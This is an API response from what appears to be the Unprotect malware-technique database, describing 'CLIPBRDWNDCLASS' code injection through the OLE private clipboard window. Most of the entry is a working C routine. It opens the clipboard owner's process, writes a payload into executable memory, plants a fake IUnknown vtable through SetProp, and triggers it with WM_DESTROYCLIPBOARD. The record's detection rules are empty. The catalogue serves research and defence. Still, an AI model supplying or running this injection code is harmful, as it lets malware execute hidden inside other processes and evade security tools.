GET /api/techniques/160/
HTTP 200 OK
Allow: GET, PUT, PATCH, DELETE, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "name": "CLIPBRDWNDCLASS",
    "category": [
        "https://search.unprotect.it/api/categories/4/"
    ],
    "description": "The Object Linking & Embedding (OLE) library (ole32.dll) uses a private clipboard. It registers CLIPBRDWNDCLASS as a window class, creates a window derived from that class, and assigns a number of window properties to store the address of interfaces required to process clipboard data. \r\nClipboardDataObjectInterface, can be leveraged for code injection. Two other properties, ClipboardRootDataObjectInterface and ClipboardDataObjectInterfaceMTA can also be used.\r\n\r\nIf ClipboardDataObjectInterface is set to the address of an IUnknown interface and the clipboard window procedure receives a WM_DESTROYCLIPBOARD message, it will invoke the Release method.",
    "resources": "https://modexp.wordpress.com/2019/05/24/4066/",
    "tags": "ole",
    "snippets": [
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/3/",
            "technique": "https://search.unprotect.it/api/techniques/160/",
            "description": "",
            "plain_code": "typedef struct _IUnknown_t {\r\n    // a pointer to virtual function table\r\n    ULONG_PTR lpVtbl;\r\n    // the virtual function table\r\n    ULONG_PTR QueryInterface;\r\n    ULONG_PTR AddRef;\r\n    ULONG_PTR Release;       // executed for WM_DESTROYCLIPBOARD\r\n} IUnknown_t;\r\n\r\n// The following code assumes a valid clipboard window already exists. There is no error checking.\r\nVOID clipboard(LPVOID payload, DWORD payloadSize) {\r\n    HANDLE     hp;\r\n    HWND       hw;\r\n    DWORD      id;\r\n    IUnknown_t iu;\r\n    LPVOID     cs, ds;\r\n    SIZE_T     wr;\r\n    \r\n    // 1. Find a private clipboard.\r\n    //    Obtain the process id and open it\r\n    hw = FindWindowEx(HWND_MESSAGE, NULL, L\"CLIPBRDWNDCLASS\", NULL);\r\n    GetWindowThreadProcessId(hw, &id);\r\n    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);\r\n\r\n    // 2. Allocate RWX memory in process and write payload\r\n    cs = VirtualAllocEx(hp, NULL, payloadSize,\r\n        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);\r\n    \r\n    // 3. Allocate RW memory in process.\r\n    //    Initialize and write IUnknown interface\r\n    ds = VirtualAllocEx(hp, NULL, sizeof(IUnknown_t),\r\n        MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\r\n    iu.lpVtbl  = (ULONG_PTR)ds + sizeof(ULONG_PTR);\r\n    iu.Release = (ULONG_PTR)cs;\r\n    WriteProcessMemory(hp, ds, &iu, sizeof(IUnknown_t), &wr);\r\n    \r\n    // 4. Set the interface property and trigger execution\r\n    SetProp(hw, L\"ClipboardDataObjectInterface\", ds);\r\n    PostMessage(hw, WM_DESTROYCLIPBOARD, 0, 0);\r\n    \r\n    // 5. Release memory for code and data\r\n    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);\r\n    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);\r\n    CloseHandle(hp);\r\n}"
        }
    ],
    "detection_rules": []
}